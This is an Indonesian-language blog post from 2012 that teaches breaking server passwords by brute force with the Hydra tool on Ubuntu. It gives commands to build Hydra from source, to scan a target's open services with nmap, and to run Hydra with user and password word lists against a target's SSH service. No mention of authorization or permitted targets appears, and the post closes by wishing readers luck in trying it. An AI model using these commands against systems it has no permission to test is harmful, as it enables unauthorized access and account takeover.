Tuesday 4 September 2012

TEKNIK JEBOL PASSWORD SERVER DENGAN CARA BRUTE FORCE ATTACK DENGAN MENGGUNAKAN HYDRA PADA OS UBUNTU




Brute force attack adalah sebuah metode untuk menebak suatu kunci dari sebuah enkripsi atau sebuah otentikasi dengan cara mencobanya berkali-kali dengan berbagai macam kombinasi huruf angka maupun simbol.

Cara Install Hydra :
kita membutuhkan beberapa file aplikasi untuk hydra.

#apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev \

libmysqlclient-dev libpq-dev libsvn-dev firebird2.1-dev libncp-dev

kemudian download paket hydra di http://www.thc.org/releases/hydra-7.2-src.tar.gz

extract paket hydra
#tar -xzvf hydra-7.2-src.tar.gz
#cd hydra-7.2-src

./configure
make
make install


Cara menggunakan hydra :
#hydra -L “user list “ -P “word list” ip-target service PLAIN

keterangan :
-L digunakan jika kita mempunyai list user yang kemungkinan dipakek ( gak pakek -L juga boleh tapi harus disebut kan nama user nya, tapi harus huruf L kecil ( l ).
Contoh : -l admin
-P adalah wordlist yang kita gunakan / punya.
Ip target : Diisi target kita, misalnya router / asalkan ada IP termasuk service yang berjalan
Service : layanan yang terbuka.
PLAIN : Jika target kita tidak menggunakan https. Jika ada gunakan -S untuk melakukan koneksi SSL.

Untuk megetahui layanan yang terbuka dapat menggunakan nmap. Tapi harus nmap terlebih dahulu.

#nmap -sV iptarget

Contoh penggunaan hydra:
hydra -L /home/ehmhem/user.txt -P /home/ehmhem/password.lst 192.168.1.1 ssh PLAIN

Jika ada problem. mohon koment...

Mohon maaf jika ada kesalahan..

SELAMAT MENCOBA..
THANKS FOR ALL UBUNTU MASTER

BY : AGUS WIANA

0 comments :

Post a Comment

visitors

Flag Counter

Pageviews from the past week